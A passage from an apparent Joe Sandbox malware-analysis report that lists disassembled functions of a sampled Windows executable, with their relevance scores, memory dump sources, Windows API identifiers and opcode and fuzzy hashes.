                                                                                          • Instruction Fuzzy Hash: ED51DD36B0C682CBE758FF3195446A9B7A1FB4A794F400231EAAE477E5DF38E4518720
                                                                                          Function 00007FF74D06BA2C Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc
                                                                                          • String ID:
                                                                                          • API String ID: 190572456-0
                                                                                          • Opcode ID: a18f96543d52060ea1fb4eaea9751658dcb69330229f7bbe75e5b271c8b8e6e3
                                                                                          • Instruction ID: 353de3cc471d21237ab31c5e8f0d777e53d0d003eddd6e80d800d20b0d0c6cb1
                                                                                          • Opcode Fuzzy Hash: a18f96543d52060ea1fb4eaea9751658dcb69330229f7bbe75e5b271c8b8e6e3
                                                                                          • Instruction Fuzzy Hash: 7841E8A1B1DA06C1FA11BF96A8042B6E395BF48BE0F895535DD9D4B3A8FE7CE4008310
                                                                                          Function 00007FF74D0DFF50 Relevance: 7.6, APIs: 5, Instructions: 109COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Show$Enable
                                                                                          • String ID:
                                                                                          • API String ID: 2939132127-0
                                                                                          • Opcode ID: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
                                                                                          • Instruction ID: 0ed6c23a3166c63a6dda24607148f54cc831bca3c635a897e0e165e89bbb3d4a
                                                                                          • Opcode Fuzzy Hash: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
                                                                                          • Instruction Fuzzy Hash: 7A514332A0EA8AC1EB55FB15D45867CB760EB88B44F994132DE8D17BB0EE3DE441D720
                                                                                          Function 00007FF74D09D924 Relevance: 7.6, APIs: 5, Instructions: 91sleepwindowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessagePostSleep$RectWindow
                                                                                          • String ID:
                                                                                          • API String ID: 3382505437-0
                                                                                          • Opcode ID: 53e5e18aae174657f43a3affddf2552eb5f4829ae1ffd7803c72ea05724a17bc
                                                                                          • Instruction ID: e9479091ed42369e10f89ed6cfe28777d0fc86beba97f3a37ef4dbfac46a42b2
                                                                                          • Opcode Fuzzy Hash: 53e5e18aae174657f43a3affddf2552eb5f4829ae1ffd7803c72ea05724a17bc
                                                                                          • Instruction Fuzzy Hash: E631D93660C64587E710FF29E44826DB391F749B98F800135EEDD877A4DE7CE8418710
                                                                                          Function 00007FF74D0B3824 Relevance: 7.6, APIs: 5, Instructions: 89windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                          • String ID:
                                                                                          • API String ID: 2256411358-0
                                                                                          • Opcode ID: c134d4337344e0b5e6f60fa6ff3406e13c81d8ed9a5a6472cdeb4b0526b89ef4
                                                                                          • Instruction ID: 0d955465c4687a6196ad9bdc85c4f3bf80eef0aa3f846f41abbdf4359f32f1c2
                                                                                          • Opcode Fuzzy Hash: c134d4337344e0b5e6f60fa6ff3406e13c81d8ed9a5a6472cdeb4b0526b89ef4
                                                                                          • Instruction Fuzzy Hash: B9419021E0DA87C5FF60BB54A8487B9A690EF44B44FE80135D8CD471B5FE7DE4448B21
                                                                                          Function 00007FF74D0A1B34 Relevance: 7.6, APIs: 5, Instructions: 74windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$BuffCharUpperVisibleWindowwcsstr
                                                                                          • String ID:
                                                                                          • API String ID: 2655805287-0
                                                                                          • Opcode ID: b5ab547c948b7cef08c9277144327c084d2ec7411446b628b916d0c489a33ceb
                                                                                          • Instruction ID: 327a35809bbc9510def4e807e1c0da662b4ac802efd0f59d7673bbd360ea03a0
                                                                                          • Opcode Fuzzy Hash: b5ab547c948b7cef08c9277144327c084d2ec7411446b628b916d0c489a33ceb
                                                                                          • Instruction Fuzzy Hash: 54219722B0D682C5EB54FB12A919279A690BF89FE0F854931EE9D477A5FE3CD4508320
                                                                                          Function 00007FF74D0C2E64 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$ForegroundPixelRelease
                                                                                          • String ID:
                                                                                          • API String ID: 4156661090-0
                                                                                          • Opcode ID: 0803af3d0555ee4f2e7cd4680bdbd11eb807c22797343ae4eaf726b5c3b1d4d7
                                                                                          • Instruction ID: 7dc29ea196831c1dfad491570eb1d280a402f814bdf57f81d2d644c902b407c6
                                                                                          • Opcode Fuzzy Hash: 0803af3d0555ee4f2e7cd4680bdbd11eb807c22797343ae4eaf726b5c3b1d4d7
                                                                                          • Instruction Fuzzy Hash: A6217122B0CA51C6E708FF26E89817DE7A0FB88F90B444435DE8D87B65EF78D4418750
                                                                                          Function 00007FF74D032370 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ObjectSelect$BeginCreatePath
                                                                                          • String ID:
                                                                                          • API String ID: 3225163088-0
                                                                                          • Opcode ID: 8abe7a71c66bee896d504cb3d5ab816aa1492e552a9085df695a80683d63dbe3
                                                                                          • Instruction ID: e06a07c8430f8d9620890266daf10217aca671774814c855c9453b02d1e02d03
                                                                                          • Opcode Fuzzy Hash: 8abe7a71c66bee896d504cb3d5ab816aa1492e552a9085df695a80683d63dbe3
                                                                                          • Instruction Fuzzy Hash: 61313A31A1C746CBE340BB11B844339F7A1FB85BA0F950239DA8D57664EFBDE4858B20
                                                                                          Function 00007FF74D061F44 Relevance: 7.6, APIs: 5, Instructions: 60threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 2067211477-0
                                                                                          • Opcode ID: 6c75004fdc8f89f48edb4038dcc6ab145b99058f26a8cd052d9a22877b7c3d52
                                                                                          • Instruction ID: 8dcee7390a46770d54c9bf0dbcafad9a2d7716f08361b0e28be2ad1a29625e9f
                                                                                          • Opcode Fuzzy Hash: 6c75004fdc8f89f48edb4038dcc6ab145b99058f26a8cd052d9a22877b7c3d52
                                                                                          • Instruction Fuzzy Hash: B3215025B0D786C5EE14FFA6A418179E3E0AF84B80F884935EA8D477B5FF3CE4008620
                                                                                          Function 00007FF74D06F9D4 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _set_statfp
                                                                                          • String ID:
                                                                                          • API String ID: 1156100317-0
                                                                                          • Opcode ID: e270cafaa1c1bb403facffb31b6a836e27aa4e45b093d38abbba4bbe7c8013ef
                                                                                          • Instruction ID: a981fef20390d3cf9b445c005cf595fc9bb77a2e6df868a7dd3926cd034f248d
                                                                                          • Opcode Fuzzy Hash: e270cafaa1c1bb403facffb31b6a836e27aa4e45b093d38abbba4bbe7c8013ef
                                                                                          • Instruction Fuzzy Hash: 10118FB6F1C603C5F65431A9E5423B599417F953B0F894237FAEE476FAEE1CA8408120
                                                                                          Function 00007FF74D055244 Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Initialize__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_initialize_onexit_tables_invalid_parameter_noinfo_onexit_set_fmode
                                                                                          • String ID:
                                                                                          • API String ID: 2117695475-0
                                                                                          • Opcode ID: c6240938d00ce931eff62a9f8efb7c75b2bc90d30c2bcb96158b33b23c092f9e
                                                                                          • Instruction ID: 0b0d3f666d77e724f79823b480f02404c0b67cd0ddead8b8335716d0fd6736ed
                                                                                          • Opcode Fuzzy Hash: c6240938d00ce931eff62a9f8efb7c75b2bc90d30c2bcb96158b33b23c092f9e
                                                                                          • Instruction Fuzzy Hash: 13112700E0C563C5FA54BAF1546E2FCA2A18F95305FC60478ED9E9B2E3BD1DF8554632
                                                                                          Function 00007FF74D09CAB4 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                          • String ID:
                                                                                          • API String ID: 44706859-0
                                                                                          • Opcode ID: 3045165107d4a0871487eb7a52e49b2bb276054106bd9f861ce7bf3483f017d6
                                                                                          • Instruction ID: e02243243a117c0c21e04c452017b640a42095f9858cbb79124b5f7be06dec12
                                                                                          • Opcode Fuzzy Hash: 3045165107d4a0871487eb7a52e49b2bb276054106bd9f861ce7bf3483f017d6
                                                                                          • Instruction Fuzzy Hash: AE113636A08B81C6E710AF12E84865DB7B5FB89B90B954939DF8843B24EF38E5258740
                                                                                          Function 00007FF74D09CB58 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                          • String ID:
                                                                                          • API String ID: 44706859-0
                                                                                          • Opcode ID: 18e3121f69b2f55043958739cbc43e37301fc4036db83b04d1dc9e6091f96284
                                                                                          • Instruction ID: 368b36e01328189e3175509b4a1d526aef0492dec31dfb6c18f7ec52ec2d5968
                                                                                          • Opcode Fuzzy Hash: 18e3121f69b2f55043958739cbc43e37301fc4036db83b04d1dc9e6091f96284
                                                                                          • Instruction Fuzzy Hash: 72116A36A08B41C6E710AF02E84825DB7B5FB89B80B954836DF8903B64EF38E9158740
                                                                                          Function 00007FF74D09B748 Relevance: 7.5, APIs: 5, Instructions: 43stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                          • String ID:
                                                                                          • API String ID: 3897988419-0
                                                                                          • Opcode ID: c2625648870bea748c00488204de808f07a4ef133cb019afb6ef5a542de6e20a
                                                                                          • Instruction ID: ad76bc41856df17a524228362d435d69ad3dae9838fc0e3b03993e5cf1f35966
                                                                                          • Opcode Fuzzy Hash: c2625648870bea748c00488204de808f07a4ef133cb019afb6ef5a542de6e20a
                                                                                          • Instruction Fuzzy Hash: 9811302560CA55C6E704BB26F44032AE6A5FF8ABD0F984534EE8D47769EF3DD4418710
                                                                                          Function 00007FF74D0A2ED0 Relevance: 7.5, APIs: 5, Instructions: 37windowtimeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                          • String ID:
                                                                                          • API String ID: 3741023627-0
                                                                                          • Opcode ID: 8c0ba02d18c33329f7d04451d21e8c8e2fc8c024a9545b6606e830f761915d0e
                                                                                          • Instruction ID: 71216d9d72efe6b4f870f935a8c9b85f303a570ffafc21768a51936c17986b78
                                                                                          • Opcode Fuzzy Hash: 8c0ba02d18c33329f7d04451d21e8c8e2fc8c024a9545b6606e830f761915d0e
                                                                                          • Instruction Fuzzy Hash: 86115222A0C986C1EB65BB25E458379A360FF88B44F844035D9CD472A4EF7CD585C720
                                                                                          Function 00007FF74D0AD7F8 Relevance: 7.5, APIs: 5, Instructions: 36sleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                          • String ID:
                                                                                          • API String ID: 2833360925-0
                                                                                          • Opcode ID: e93a488e7ef773f4239d39afdac6f2cad4444a29d3dd75f0fed3b9e62e675ca8
                                                                                          • Instruction ID: f4cb47fbe5333926d8237fdd7e70dd25e32ca7f788238d18b26f00d135ef755a
                                                                                          • Opcode Fuzzy Hash: e93a488e7ef773f4239d39afdac6f2cad4444a29d3dd75f0fed3b9e62e675ca8
                                                                                          • Instruction Fuzzy Hash: B801D820A0CA06C2EB05F735E49913DE360EFA9780B980635E18F57671FF6CE484C630
                                                                                          Function 00007FF74D0B0008 Relevance: 7.5, APIs: 5, Instructions: 33synchronizationthreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,00007FF74D0929AD,?,?,?,00007FF74D042AB2), ref: 00007FF74D0B003C
                                                                                          • TerminateThread.KERNEL32(?,?,?,00007FF74D0929AD,?,?,?,00007FF74D042AB2), ref: 00007FF74D0B0047
                                                                                          • WaitForSingleObject.KERNEL32(?,?,?,00007FF74D0929AD,?,?,?,00007FF74D042AB2), ref: 00007FF74D0B0055
                                                                                          • ~SyncLockT.VCCORLIB ref: 00007FF74D0B005E
                                                                                            • Part of subcall function 00007FF74D0AF7B8: CloseHandle.KERNEL32(?,?,?,00007FF74D0B0063,?,?,?,00007FF74D0929AD,?,?,?,00007FF74D042AB2), ref: 00007FF74D0AF7C9
                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,00007FF74D0929AD,?,?,?,00007FF74D042AB2), ref: 00007FF74D0B006A
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$CloseEnterHandleLeaveLockObjectSingleSyncTerminateThreadWait
                                                                                          • String ID:
                                                                                          • API String ID: 3142591903-0
                                                                                          • Opcode ID: ba6bd7e5b15845e6b6bdca5424b03e7aeaa25a678f545ea5128a0138939c9a9e
                                                                                          • Instruction ID: e1557492208c0f0868b8316add197534448263bc228f73fb7fa7b25fcb62e42a
                                                                                          • Opcode Fuzzy Hash: ba6bd7e5b15845e6b6bdca5424b03e7aeaa25a678f545ea5128a0138939c9a9e
                                                                                          • Instruction Fuzzy Hash: 4501133AA1CA45C6E700AF15E44822DB360FB88B90F904435DB8A43B65EE38E892C650
                                                                                          Function 00007FF74D0322E8 Relevance: 7.5, APIs: 5, Instructions: 31COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
